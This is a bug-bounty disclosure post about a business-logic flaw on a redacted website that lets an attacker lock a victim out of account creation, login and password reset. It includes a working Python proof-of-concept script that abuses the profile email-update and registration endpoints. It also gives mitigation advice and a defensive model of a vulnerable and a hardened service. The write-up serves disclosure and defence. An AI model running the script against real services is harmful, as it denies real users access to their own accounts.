Unauthorized Email Address Change Blocks User Account Access — $200

Umair Farooqui ✪
3 min read · Oct 11, 2023


Greetings to the vigilant online community,

Today, I am excited to share my journey of discovery, where I unveiled a critical security vulnerability on the Redacted website. This story showcases the power of responsible disclosure and how I came across an issue that could potentially affect users’ accounts.

The vulnerability I uncovered allows malevolent actors to prevent legitimate users from creating an account, logging in, or resetting their passwords. It involves a lapse in business logic, enabling attackers to manipulate the system to obstruct legitimate users from accessing their own accounts.

Let’s break down how this vulnerability operates:

  1. Attacker Updates Their Own Email Address to the Victim’s: The attacker calls the profile-update API endpoint on their own account and sets the email address to the victim’s known email address.
  2. Attacker Attempts to Create an Account with the Victim’s Email: The attacker starts the registration flow using the victim’s email address, which is now attached to the attacker’s profile after step 1. The (Private Program) system detects the conflicting email address and fails to create the user profile, leaving the registration in a broken state.
  3. Attacker Reverts Their Own Email Address: To avoid locking themselves out, the attacker restores their original email address with the same API request as in step 1.

Here is the Proof-of-Concept (PoC) script (indentation restored; the hard-coded Content-Length headers and the unused json import from the original are dropped, since requests computes the length itself and a wrong value breaks the request):

import requests

auth_token = 'authentication_token from cookie'  # attacker auth token
remember_token = auth_token

# attacker id (personId)
attacker_id = 'attacker personal profile id (personId)'

# attacker email
attacker_email = 'attacker email'


def update_email(email):
    """Step 1 / step 3: change the attacker's own profile email address."""
    url = f"https://www.redacted.com/api/v3/people/{attacker_id}"
    headers = {
        "Host": "www.redacted.com",
        "Cookie": f"authentication_token={auth_token}; remember_token={remember_token}",
    }
    data = {
        "person": {
            "email": email,
            "profile": {"customer": {}}
        }
    }
    response = requests.put(url, headers=headers, json=data)
    return response


def create_account(email):
    """Step 2: start registration with the (now conflicting) email address."""
    url = "https://www.redacted.com/register/"
    headers = {
        "Host": "www.redacted.com",
        "Content-Type": "application/json",
    }
    data = {
        "returnPerson": True,
        "first": email,
        "last": email,
        "password": email,
        "email": email
    }
    response = requests.post(url, headers=headers, json=data)
    return response


email = input("Enter an email address: ")

update_email(email)           # step 1: take over the address on the attacker's profile

create_account(email)         # step 2: registration fails on the conflict

update_email(attacker_email)  # step 3: restore the attacker's own address

print("===============================================")
print("Now User Can't Create Or Login Into His Account")
print("===============================================")

The Impact

The repercussions of this vulnerability are significant:

  • Blocking Victim’s Account: The victim is effectively locked out of their own account, because the attacker temporarily held their email address and the failed registration left no usable user profile behind.
  • Inability to Create an Account: Legitimate users cannot create a new account using their email address, as the system recognizes the email as already in use.
  • Preventing Sign-In: Legitimate users cannot sign in, as their user profile was not successfully created.
  • Disabling Password Reset: Even if a victim attempts to reset their password, it won’t work as their email address is no longer associated with a valid user profile.

Recommendations for Mitigation

To mitigate this vulnerability and prevent similar incidents in the future, I recommend the following actions:

  • Strengthen business logic to ensure user profiles are created only for successfully registered users.
  • Implement stronger email address validation and authorization checks when updating email addresses.
  • Add additional security layers for account creation and password reset processes.
  • Implement mechanisms to prevent attackers from changing legitimate users’ email addresses.
  • Provide proper monitoring and alerting systems for suspicious activities on user accounts.
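To make the three-step flow above and the mitigations concrete, here is an added in-memory model (my own illustration, not the post's PoC and not the program's code; all class and method names are hypothetical). The weak service applies an email change immediately and writes the credential row before the profile row, so a failed registration leaves an orphan behind; the hardened service checks before it writes, only lets a caller change their own profile, records any new address as pending until a token sent to that address comes back, and emits audit events that a monitoring rule could alert on.

```python
import hmac
import secrets
from typing import Optional


class VulnerableService:
    """In-memory model of the behaviour the write-up describes."""

    def __init__(self):
        self.credentials = {}   # email -> password (plain text, model only)
        self.people = {}        # person_id -> profile email
        self.audit = []         # constructed audit trail, for detection
        self._next_id = 1

    @staticmethod
    def norm(email: str) -> str:
        return email.strip().lower()

    def _profile_with(self, email: str) -> Optional[int]:
        return next((pid for pid, e in self.people.items() if e == email), None)

    def _new_person(self, email: str) -> int:
        pid, self._next_id = self._next_id, self._next_id + 1
        self.people[pid] = email
        return pid

    def register(self, email: str, password: str) -> int:
        email = self.norm(email)
        if email in self.credentials:
            raise ValueError("email already registered")
        self.credentials[email] = password        # credential row written first ...
        if self._profile_with(email) is not None:  # ... then the profile write aborts on the
            raise ValueError("profile conflict")  # conflicting address, leaving an orphan row
        return self._new_person(email)

    def update_email(self, caller_id: int, target_id: int, new_email: str) -> None:
        # No ownership check and no proof the caller controls the new address.
        self.people[target_id] = self.norm(new_email)

    def login(self, email: str, password: str) -> bool:
        email = self.norm(email)
        return self.credentials.get(email) == password and self._profile_with(email) is not None

    def can_reset_password(self, email: str) -> bool:
        return self._profile_with(self.norm(email)) is not None


class HardenedService(VulnerableService):
    """Checks before writes; a new address counts only once its owner confirms it."""

    def __init__(self):
        super().__init__()
        self.pending_reg = {}     # token -> (email, password); reserves nothing
        self.pending_change = {}  # person_id -> (new_email, token)

    def register(self, email: str, password: str) -> str:
        email = self.norm(email)
        if email in self.credentials:
            raise ValueError("email already in use")
        token = secrets.token_urlsafe(32)   # a real system mails this to the address
        self.pending_reg[token] = (email, password)
        self.audit.append(f"registration_requested email={email}")
        return token

    def confirm_registration(self, token: str) -> Optional[int]:
        email, password = self.pending_reg.pop(token, (None, None))
        if email is None or email in self.credentials:   # bad token, or taken meanwhile
            return None
        self.credentials[email] = password
        return self._new_person(email)

    def update_email(self, caller_id: int, target_id: int, new_email: str) -> str:
        if caller_id != target_id:
            raise PermissionError("may only change your own address")
        new_email = self.norm(new_email)
        if new_email in self.credentials:
            raise ValueError("email already in use")
        token = secrets.token_urlsafe(32)
        self.pending_change[target_id] = (new_email, token)   # live address untouched
        self.audit.append(f"email_change_requested person={target_id} to={new_email}")
        return token

    def confirm_email(self, person_id: int, token: str) -> bool:
        new_email, expected = self.pending_change.get(person_id, ("", ""))
        if not expected or not hmac.compare_digest(expected, token):
            return False
        del self.pending_change[person_id]
        if new_email in self.credentials:   # its real owner registered it meanwhile
            return False
        old = self.people[person_id]
        self.credentials[new_email] = self.credentials.pop(old)
        self.people[person_id] = new_email
        self.audit.append(f"email_change_confirmed person={person_id} from={old} to={new_email}")
        return True


def run_scenario(svc: VulnerableService) -> dict:
    """Replays the write-up's three steps, then the victim's own attempts
    (addresses constructed for the model). Tokens mailed to the victim's
    inbox are never confirmed, since only the victim can read them."""
    hardened = isinstance(svc, HardenedService)
    attacker_email, victim_email = "attacker@example.com", "victim@example.com"
    attacker = svc.register(attacker_email, "attacker-pw")
    if hardened:
        attacker = svc.confirm_registration(attacker)   # attacker's own inbox
    for step in (lambda: svc.update_email(attacker, attacker, victim_email),    # step 1
                 lambda: svc.register(victim_email, "throwaway"),               # step 2
                 lambda: svc.update_email(attacker, attacker, attacker_email)):  # step 3
        try:
            step()
        except ValueError:
            pass   # conflict (vulnerable service) or nothing to revert (hardened)
    outcome = {}
    try:
        receipt = svc.register(victim_email, "victim-pw")
        outcome["registered"] = (svc.confirm_registration(receipt) if hardened else receipt) is not None
    except ValueError:
        outcome["registered"] = False
    outcome["login"] = svc.login(victim_email, "victim-pw")
    outcome["reset"] = svc.can_reset_password(victim_email)
    return outcome
```

Running run_scenario against VulnerableService reproduces the lock-out (the victim can neither register, log in, nor reset), while HardenedService leaves the victim unaffected: the attacker's pending change and pending registration never take effect because the confirmation tokens only reach the victim's inbox, and the registration code writes nothing until every conflict check has passed. The audit entries are the hook for the monitoring recommendation: a burst of email_change_requested events from one account, or requests naming addresses that later register, is worth an alert.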

Responsible Disclosure

As responsible security researchers, it is our duty to report such vulnerabilities to the relevant parties. I promptly reported this critical security flaw to the Private Program team through HackerOne, a platform that facilitates responsible disclosure. In recognition of my efforts, I was awarded a $200 bounty.

Let’s keep the internet secure, one discovery at a time!

Written by Umair Farooqui ✪

I am a Full Stack Developer 👩‍💻 | Security Researcher 📖 | Open Source Lover ❤ | Bug Hunter🐞| Penetration Tester💻